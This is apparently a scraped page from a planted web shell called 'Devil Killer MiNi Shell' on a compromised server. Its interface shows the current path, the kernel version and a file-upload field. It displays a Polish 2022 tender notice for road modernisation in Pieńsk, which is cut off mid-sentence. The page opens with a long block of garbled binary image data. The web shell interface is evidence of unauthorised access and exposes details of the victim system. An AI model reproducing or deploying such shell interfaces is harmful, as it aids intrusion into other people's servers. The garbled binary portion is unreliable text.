JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220706/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220706/0024206301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg gminnych na terenie miasta i gminy Pieńsk. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesławiecka 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 77 86 511-514</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">75 77 86 405</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg gminnych na terenie miasta i gminy Pieńsk. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc5a3566-fd1d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00242063</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023103/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja dróg gminnych na terenie miasta i gminy Pieńsk</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.piensk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, e PUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, e-mail nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Informacje o wymaganiach<br/>technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:Zamawiający wymaga, aby w<br/>tytule maila był podany nr sprawy, co<br/>ułatwi komunikację pomiędzy stronami postępowania. 2) Wszelką korespondencję związaną z<br/>niniejszym postępowaniem, należy przekazywać za pośrednictwem ePUAP lub poczty elektronicznej na<br/>adres: nowicki@piensk.com.pl Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed<br/>upływem wymaganego terminu. 3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania<br/>oferty lub wniosku oraz do formularza do komunikacji.4) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z mini Portalu dostępnym<br/>podadresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspxorazRegulaminie e PUAP.5)Wykonawca<br/>przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptujewarunki<br/>korzystania z mini Portalu, określone w Regulaminie mini Portalu oraz zobowiązuje siękorzystając z<br/>miniPortalu przestrzegać postanowień tego regulaminu.6) Maksymalny rozmiar plikówprzesyłanych za<br/>pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz<br/>dokomunikacjiwynosi150 MB.7) Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125<br/>ust.1 pzp,podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji,oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę<br/>ichprzekazania na ePUAP.8) W postępowaniu o udzielenie zamówienia<br/>korespondencjaelektroniczna(inna niż oferta Wykonawcy i załączniki do oferty)odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą<br/>tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający iWykonawcy posługują się numerem ogłoszenia (BZP).9) Dokumenty<br/>elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez<br/>Wykonawcę za pośrednictwemFormularza do komunikacji jako załączniki. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: nowicki@piensk.com.pl<br/>Sposóbsporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie)10) Zamawiający nie przewiduje<br/>sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków<br/>komunikacjielektronicznej,wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawieochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochroniedanych, zwane dalej„RODO”)(Dz.U.<br/>UE. L. 119.1 z 04.05.2016) informuję, iż:1) Administratorem danychosobowych jest Pani Agnieszka<br/>Demichowicz Z administratorem można się skontaktowaćpoprzezadresemail:iod@piensk.com.pl lub<br/>pisemnie na adres siedzibyadministratora;2)Administrator wyznaczył inspektora ochrony danych, z<br/>którym może się Pani/Panskontaktowaćpoprzezemailiod@piensk.com.pl Z inspektorem ochrony<br/>danych można się kontaktowaćwe wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania zpraw związanych z przetwarzaniem danych;3) zgodnie z treścią art.<br/>6ust. 1 lit. c RODO Pani/Panadane osobowe przetwarzane będą w celu realizacji procesu wyboru<br/>wykonawcy na podstawie prowadzonego postępowania o udzielenie zamówienia publicznego, a<br/>następnie realizacjipostanowień umownych związanych z wykonywanym zamówieniem;4) w związku z<br/>przetwarzaniemPani/Pana danych w celach wskazanych powyżej, dane osobowe mogą być<br/>udostępniane innymodbiorcom lub kategoriom odbiorców danych osobowych, na podstawie przepisów<br/>prawa orazzawartych umów powierzenia przetwarzania danych, jeżeli wymagane byłoby to w celu<br/>realizacjipostanowień umownych,5) w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będąpodejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;6)Pani/Pana dane<br/>osobowe będą przechowywane,zgodnie z art. 97 ust. 1 ustawy – Prawo zamówień publicznych przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;7) posiada<br/>Pani/Panprawo do:a)dostępu dodanych osobowych, na podstawie art. 15 RODO, przy czym<br/>administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego;b)sprostowania lub uzupełnienia danych osobowych, na podstawie<br/>art.16RODO, przy czym skorzystanie z niniejszego uprawnienia nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą–Prawo zamówień publicznych;c) ograniczenia przetwarzania danych<br/>osobowych, na podstawie art.18RODO, przy czym wystąpienie z żądaniem nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego;d) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan,że przetwarzanie danych osobowych narusza przepisy RODO;8) nie przysługuje Pani/Panu prawo do:a)usunięcia lub<br/>przenoszenia danych osobowych,b)wniesienia sprzeciwu wobec<br/>przetwarzania danych osobowych;9)podanie danych osobowych jest konieczne w celu realizacji<br/>postępowania o udzielenie zamówienia publicznego oraz realizacji postanowień umownych. Niepodanie<br/>danych będzie skutkowało brakiem możliwości rozpatrzenia oferty złożonej w postępowaniu oraz<br/>zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ISM.03.271.PN.07.2022r.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest modernizacja dróg gminnych na terenie miasta i gminy Pieńsk.<br/>W ramach zadania zostaną zrealizowane następujące roboty budowlane:<br/>Dla jezdni bitumicznych i chodników należy wykonać frezowanie masy bitumicznej celem wyrównania powierzchni, spryskanie emulsją asfaltową oraz ułożenie nowych warstw bitumicznych 2 x 4 cm wiążącej i ścieralnej, wymiana krawężników, wykonanie ścieku przykrawężnikowego <br/>z kostki brukowej szerokości 20 cm na ławie betonowej oraz wykonanie chodników o nawierzchni <br/>z warstwy bitumicznej oraz wyregulowanie infrastruktury technicznej. Wykonanie zjazdów z masy bitumicznej.<br/>Dla dróg gruntowych utwardzonych zaprojektowano utwardzenie istniejących jezdni wraz obustronnym pasem zieleni lub wysypanym tłuczniem kamiennym o szerokości 0.75 cm.<br/>Projektowane nawierzchnię dróg należy dowiązać sytuacyjnie i wysokościowo do istniejących dróg gminnych.<br/>Projektowana nawierzchnię wjazdów do posesji należy dowiązać sytuacyjnie i wysokościowo.<br/>Po długości wykonać krawężnik obniżony na ławie betonowej wraz z wykonaniem ścieku przykrawężnikowego z kostki brukowej szerokości 20 cm na ławie betonowej oraz wyregulowanie infrastruktury technicznej. Zaprojektowano konstrukcję nawierzchni jezdni i zjazdów z kostki betonowej 8cm, podsypki cementowo-piaskowej 5cm, podbudowy z kruszywa łamanego 0/63mm- 20cm, stabilizacji kruszywa z cementem, 5 MPa-20cm, warstwę odsączającą 10cm.<br/>Odwodnienia poprzeczne i podłużne dróg oraz zjazdów funkcjonuje jako powierzchniowe odtworzyć i wyprofilować zgodnie z normami <br/>i obowiązującymi przepisami dostosowując z istniejącą infrastrukturą drogową.<br/>WAŻNE: <br/>Podczas robót budowlanych należy przewidzieć i brać pod uwagę drobną modernizację infrastruktury technicznej drogowej naziemnej i podziemnej. Należy udrożnić systemy rur odwodnienia kanalizacji deszczowej, w razie konieczności po dokonaniu robót odkrywkowych dokonać wymiany zniszczonej infrastruktury która technicznie może uniemożliwić realizację dalszej inwestycji. Wszystkie zniszczone urządzenia i elementy drogowe należy odtworzyć do stanu pierwotnego. W przypadku zdjęcia warstwy bitumicznej i napotkaniu nawierzchni z kostki granitowej należy przed asfaltowaniem wzmocnić nawierzchnię geowłókniną lub siatką.<br/>Każdy odcinek drogi należy rozpatrywać z osobna, zaleca się wizję terenową celem ustalenia zakresu robót w terenie z weryfikacją i dostosowaniem do założeń projektowych. <br/>Szczegółowy zakres robót zawarty jest w dokumentacji technicznej oraz przedmiarze robót. Przedmiar robót stanowi pomoc w określeniu zakresu robót. Przedmiar robót nie jest podstawą ilościową do wyceny oferty. Wyznacznikiem zakresu wykonania inwestycji jest dokumentacja techniczna, STWiOR oraz opis przedmiotu zamówienia.<br/>Zamawiający zmienił zakres robót budowlanych i dokumentacji technicznej, wyłączone zostały następujące odcinki dróg:<br/>-fragment drogi 8 DWP, od ul. Bolesławieckiej do ul. Kościuszki 230mb (droga+obustronny chodnik),<br/>- droga, Batorego I, odcinek wzdłuż PKP 140mb (droga+chodnik),<br/>-ul. Dąbrowskiego, lokalizacja długości 0+325 – 0,052, 52mb<br/>-droga, Hutnicza II odcinek drogi, między skrzyżowaniami ul. Spacerowej i Zacisznej 150mb,<br/>-droga, Kościuszki odcinek drogi od skrzyżowania ul. Mickiewicza do budynku ul. Kościuszki 39 – 220mb,<br/>-ul. Spokojna, odcinek drogi wzdłuż PKP o długości 360mb,<br/>-ul. Staszica, dwa odcinki drogi, od ul. Dąbrowskiego do ul. Bolesławieckiej <br/>o długości 82mb i od ul. Bolesławieckiej do O.M. Tomaszka o długości 172mb. <br/>Wyłączone przez Zamawiającego odcinki należy zweryfikować z dokumentacja techniczną i przedmiarem robót i odpowiednio pomniejszyć zakres wyceny.<br/>Określenie wymagań o których mowa w art. 95 ust. 2 Ustawy Pzp: <br/> 1. Na podstawie art 95 ust 2 ustawy Pzp, Zamawiający wymaga, aby niżej wymienione czynności w zakresie realizacji przedmiotu zamówienia wykonywały osoby, które będą zatrudnione przez Wykonawcę lub podwykonawcę (w przypadku realizacji zamówienia przy udziale podwykonawców) za wynagrodzeniem na podstawie umowy o pracę określonej <br/>w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2016 r. poz. 1666).: <br/> Tak więc wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane <br/>z wykonywaniem prac, czyli tzw. pracowników fizycznych, wykonawców i podwykonawców, którzy będą wykonywać wykopy pod infrastrukturę techniczną, podbudowy i stabilizacji podłoża, wykonaniu nawierzchni dróg, montaż urządzeń infrastruktury technicznej. Wymóg nie dotyczy, między innymi osób kierujących robotami budowlanymi, wykonujących obsługę geodezyjną, dostawców materiałów. <br/> 2. W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane <br/>w punkcie 1) czynności. Zamawiający uprawniony jest w szczególności do:<br/> 1) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania w/w wymogów i dokonywania ich oceny,<br/> 2) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania w/w wymogów,<br/> 3) przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/> 3. W trakcie realizacji zamówienia na każde wezwanie Zamawiającego w wyznaczonym <br/>w tym wezwaniu terminie Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy <br/>o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane w punkcie 1) czynności w trakcie realizacji zamówienia:<br/> 1) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy<br/> o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;<br/> 2) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy <br/>z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. w szczególności bez adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania; <br/> 3) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;<br/> 4) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. <br/>o ochronie danych osobowych (t.j. Dz. U. z 2016 r. poz. 922).<br/> 5) Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości kwoty minimalnego miesięcznego wynagrodzenia za pracę obowiązującego w chwili stwierdzenia przez Zamawiającego niedopełnienia tych obowiązków za każdy taki przypadek osobno. Fakt z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1) czynności zostanie potwierdzony pisemną notatką sporządzoną przez zamawiającego (personel). Notatka nie musi być podpisana przez wykonawcę lub jego przedstawicieli.<br/> 6) Nie złożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności, co skutkować może odstąpieniem od umowy z winy wykonawcy.<br/> 7) W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233251-3 - Wymiana nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla 